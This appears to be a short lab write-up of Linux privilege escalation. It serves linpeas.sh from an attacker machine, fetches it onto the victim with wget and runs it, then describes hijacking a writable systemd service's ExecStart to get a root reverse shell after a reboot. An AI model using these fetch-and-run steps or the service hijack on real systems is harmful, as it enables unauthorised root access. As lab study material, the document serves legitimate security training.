Privilege escalation

# start a webserver on port 80
python3 -m http.server 80 -d /usr/share/peass/linpeas/

# Download it to victim machine.
cd /tmp && wget http://192.168.45.230/linpeas.sh

# Run the file
chmod a+x linpeas.sh
./linpeas.sh

Result from Linpeas.sh

Checking pythonapp.service

Let's first read the content of this file.

Looking at the content, It is clear that this file is responsible for executing or running the service.

Luckily, I have read and write access to this file. So, I will edit ExecStart Parameter with a shell command.

I am unable to edit this file in shell. So, I will take it in my Kali Linux, modify it, and then replace this file. Unable to do that as not all ports can connect to external networks.

I will edit the file in the terminal itself.

I have edited file in kali linux and then replace it.

We have changed ExecStart and also User value.

Start the webserver and send this file to temp directory.

Send the file to victim machine.

I tried to remove the original file but this didn't work.

So, I will replace the file content using redirection.

This worked!!

We can see that current user has reboot permission. So, I will restart and see if we can get the shell.

Start the listener.

Now reboot the system.

After some time you will see that you got the root shell.

Stabilize the shell.